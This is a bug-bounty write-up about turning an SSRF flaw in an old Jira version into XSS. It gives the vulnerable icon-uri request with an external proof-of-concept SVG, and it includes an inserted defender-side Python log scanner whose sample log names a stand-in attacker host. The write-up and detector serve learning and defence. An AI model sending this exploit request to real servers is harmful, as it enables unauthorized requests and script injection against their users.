How I converted SSRF to XSS in Jira

Ashish Kunwar
Jun 1, 2018 · 2 min read

I’m very much into bug bounty and I spend my whole day doing this, finding new and interesting stuff and keeping on upgrading my recon techniques.

So this site was random and had a vast number of subdomains to test.

domain *.example.com

So I used some sites to find subdomains:

1. FindSubdomains.com

2. DnsDumpster

3. VirusTotal

4. Acunetix manual tool

Before I start: Acunetix does subdomain scans, so just set the timeout to 20 and you will get a really big list with banners and response headers. (It does half of the work for you.)

Now, I had been through lots of subdomains and I was specifically looking for any Jira environment, and I found one.

Let’s say wiki.example.com.

So I looked at the version and it was “5.8.13”, which is affected by SSRF…

I remembered the Alyssa Herrera writeup “Piercing the Veil: Server Side Request Forgery to NIPRNet access”.

So I quickly visited

plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com

And boom, I got the Google page and I’m like

Hell yeah!

So I followed the writeup but couldn’t manage to get any sensitive info.

[Yes, I tried everything… nothing worked.]

And that’s where I was like “why, God? why?”

Why, God?

And then suddenly it came to my mind and I went to the Brute XSS blog,

copied “http://brutelogic.com.br/poc.svg”, and put it in place of https://google.com

And boom, I got XSS.

SSRF to XSS in #Vain
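A defender-side example, added here and not part of the original post: a small Python script that scans web-server access-log lines for requests to the icon-uri servlet named above and flags any whose consumerUri points outside an allowlist of expected hosts, or at an SVG. The second check exists because, as the writeup shows, the servlet hands the fetched body back to the browser, so an SVG (which can carry script) becomes XSS. The combined-log-format, the allowlist and the sample log lines are all constructed assumptions for this example, not Jira’s own logging.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption for this example: the only hosts the icon-uri fetcher is
# expected to reach. A real deployment would maintain its own list.
ALLOWED_HOSTS = {"wiki.example.com", "jira.example.com"}

# The servlet path from the writeup.
ICON_URI_PATH = "/plugins/servlet/oauth/users/icon-uri"

# Minimal parser for combined-log-format lines: client IP, timestamp,
# method, request target and status are all this script needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines (not real traffic); 203.0.113.0/24 and
# 198.51.100.0/24 are documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jun/2018:10:00:01 +0000] '
    '"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://google.com HTTP/1.1" 200 1423',
    '203.0.113.5 - - [01/Jun/2018:10:00:09 +0000] '
    '"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http%3A%2F%2Fattacker.invalid%2Fpoc.svg HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jun/2018:10:01:00 +0000] '
    '"GET /plugins/servlet/oauth/users/icon-uri?consumerUri=https%3A%2F%2Fwiki.example.com%2Favatar.png HTTP/1.1" 200 2048',
    '198.51.100.9 - - [01/Jun/2018:10:02:00 +0000] '
    '"GET /browse/PROJ-1 HTTP/1.1" 200 9000',
]


def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_target(target):
    """Inspect one request target.

    Returns None when the request is not an icon-uri fetch (or carries no
    consumerUri, so there is nothing to evaluate); otherwise a dict with the
    decoded consumerUri, its host, and the reasons it deserves a look
    (an empty list means it stayed inside the allowlist and was not an SVG).
    """
    parts = urlsplit(target)
    if not parts.path.endswith(ICON_URI_PATH):
        return None
    # parse_qs percent-decodes the value for us.
    values = parse_qs(parts.query).get("consumerUri")
    if not values:
        return None
    uri = values[0]
    dest = urlsplit(uri)
    host = (dest.hostname or "").lower()
    reasons = []
    if dest.scheme not in ("http", "https"):
        reasons.append("non-http scheme")
    if host not in ALLOWED_HOSTS:
        reasons.append("fetch host outside allowlist")
    if dest.path.lower().endswith(".svg"):
        # The servlet returns the fetched body to the browser, so an SVG
        # that embeds script is the case the writeup turned into XSS.
        reasons.append("svg target")
    return {"uri": uri, "host": host, "reasons": reasons}


def scan(lines):
    """Return one finding per suspicious icon-uri request in the given lines."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        verdict = classify_target(rec["target"])
        if verdict and verdict["reasons"]:
            findings.append({"ip": rec["ip"], "ts": rec["ts"],
                             "status": rec["status"], **verdict})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} -> {f['uri']}: {', '.join(f['reasons'])}")
```

Run it directly and the two external fetches in the sample are reported while the in-allowlist avatar fetch and the unrelated issue view are not. The allowlist check alone is what catches SSRF use of the endpoint; the SVG flag only raises priority, because a fetched HTML or SVG body that the servlet reflects unchanged is the part that escalates the bug from SSRF to XSS. Status 200 on a flagged line is the strongest signal, since it means the server actually completed the outbound fetch.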

So it worked and I got a bounty of $50, which is not much (and that company sucks).

Anyway, it doesn’t matter at all; it was all about exploration, learning new things and gaining experience.

#sharing is #caring

Hope you guys enjoyed it and learned something new. #[For those who don’t know; the rest are leets.]

Thank you

./Logout

Follow me on Twitter: Ashish Kunwar

And if you have any questions, DMs are open only for followers.
